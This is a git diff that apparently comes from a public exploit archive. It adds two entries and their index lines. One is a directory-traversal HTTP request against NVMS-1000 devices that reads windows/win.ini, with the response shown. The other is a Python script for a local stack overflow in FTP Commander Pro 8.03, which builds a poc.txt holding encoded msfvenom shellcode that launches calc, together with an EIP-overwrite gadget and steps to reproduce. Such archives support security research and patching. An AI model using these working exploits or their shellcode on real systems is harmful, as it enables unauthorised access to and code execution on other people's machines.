diff --git a/exploits/hardware/webapps/47774.txt b/exploits/hardware/webapps/47774.txt new file mode 100644 index 000000000..8f82fa554 --- /dev/null +++ b/exploits/hardware/webapps/47774.txt @@ -0,0 +1,27 @@ +# Title: NVMS-1000 - Directory Traversal +# Date: 2019-12-12 +# Author: Numan Türle +# Vendor Homepage: http://en.tvt.net.cn/ +# Version : N/A +# Software Link : http://en.tvt.net.cn/products/188.html + +POC +--------- + +GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 +Host: 12.0.0.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close + +Response +--------- + +; for 16-bit app support +[fonts] +[extensions] +[mci extensions] +[files] +[Mail] +MAPI=1 \ No newline at end of file diff --git a/exploits/windows/local/47775.py b/exploits/windows/local/47775.py new file mode 100755 index 000000000..35f6a3eee --- /dev/null +++ b/exploits/windows/local/47775.py @@ -0,0 +1,100 @@ +# Exploit Title: FTP Commander Pro 8.03 - Local Stack Overflow +# Date: 2019-12-12 +# Exploit Author: boku +# Discovered by: UN_NON +# Original DoS: FTP Commander 8.02 - Overwrite (SEH) +# Original DoS Link: https://www.exploit-db.com/exploits/37810 +# Software Vendor: http://www.internet-soft.com/ +# Software Link: http://www.internet-soft.com/DEMO/cftpsetup.exe +# Version: Version 8.03 & Version 8.02 (same exploit for both) +# Tested on: Windows 10 Home 1909 (64-bit; OS-build=18363.418) +# Windows 10 Education 1909 (32-bit; OS-build=18363.418) +# Windows 10 Pro 1909 (32-bit; OS-build=18363.418) +# Windows Vista Home Basic SP1 (6.0.6001 Build 6001) +# Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600 +# Python Version: Python 2.7.16+ + +# Recreate: +# 1) Generate 'poc.txt' payload using python 2.7.x +# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy +# 3) Install & Open ftpCommander v8.03 (or v8.02) +# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command +# - A textbox will appear on the bottom of the right window +# 5) Paste payload from generated txt file into textbox +# 6) Click "Do it" +# - The program will crash & calculator will open +# Other Security Issue: +# - The program's default install path is: C:\\cftp\cftp.exe + +#!/usr/bin/python + +blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet +err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet + +try: + # EIP offset at 4108 -- if you exceed 4112 bytes you will overwrite nSEH & SEH + nops='CGS[BOKU]J'*100 # 1000 nops that are ASCII friendly + # EIP jump lands at the beginning of the buffer + # Shellcode can be up to 4108 bytes by adjusting nops & replacing shellcode + # msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper + #x86/alpha_upper succeeded with size 447 (iteration=0) + shellcode = b"" + shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49" + shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a" + shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30" + shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41" + shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42" + shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50" + shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39" + shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b" + shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c" + shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a" + shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33" + shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31" + shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b" + shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50" + shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32" + shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31" + shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48" + shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a" + shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e" + shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f" + shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43" + shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b" + shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c" + shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36" + shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35" + shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b" + shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56" + shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a" + shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50" + shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d" + shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33" + shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31" + shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f" + shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38" + shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59" + shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50" + shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51" + shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50" + shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42" + shellcode += b"\x4c\x32\x43\x53\x30\x41\x41" + # Fill the rest of the space with B's until we are at our EIP offset + offset = '\x42'*(4108-len(nops+shellcode)) + # The EAX register holds a Pointer to the beginning of our buffer + # FF20 = jmp [eax] + # !mona find -o -s '\xFF\x20' + # 0x0041081a : '\xFF\x20' | startnull,ascii {PAGE_EXECUTE_READ} [ftpcomm.exe] + # | ASLR: False; Rebase: False; SafeSEH: False; + eip = '\x1a\x08\x41' # 3 byte overwrite so we can set EIP to start with 0x00 + # After jmp [eax], we land at the beginning of our buffer + payload = nops+shellcode+offset+eip + File = 'poc.txt' + f = open(File, 'w') # open file for write + f.write(payload) + f.close() # close the file + print blt + File + " created successfully " + +except: + print err + File + ' failed to create' \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 293b12fea..8aff1f7a7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10840,6 +10840,7 @@ id,file,description,date,author,type,platform,port 47755,exploits/windows/local/47755.c,"Microsoft Windows 10 - 'WSReset' UAC Protection Bypass (propsys.dll)",2019-09-20,valen,local,windows, 47759,exploits/windows/local/47759.py,"SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)",2019-12-09,"Kirill Nikolaev",local,windows, 47763,exploits/hardware/local/47763.txt,"Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials",2019-12-10,LiquidWorm,local,hardware, +47775,exploits/windows/local/47775.py,"FTP Commander Pro 8.03 - Local Stack Overflow",2019-12-13,boku,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42083,3 +42084,4 @@ id,file,description,date,author,type,platform,port 47770,exploits/java/webapps/47770.txt,"Apache Olingo OData 4.0 - XML External Entity Injection",2019-12-11,"Compass Security",webapps,java, 47772,exploits/php/webapps/47772.rb,"OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)",2019-12-12,"Onur ER",webapps,php, 47773,exploits/php/webapps/47773.txt,"Bullwark Momentum Series JAWS 1.0 - Directory Traversal",2019-12-12,"numan türle",webapps,php, +47774,exploits/hardware/webapps/47774.txt,"NVMS 1000 - Directory Traversal",2019-12-13,"numan türle",webapps,hardware,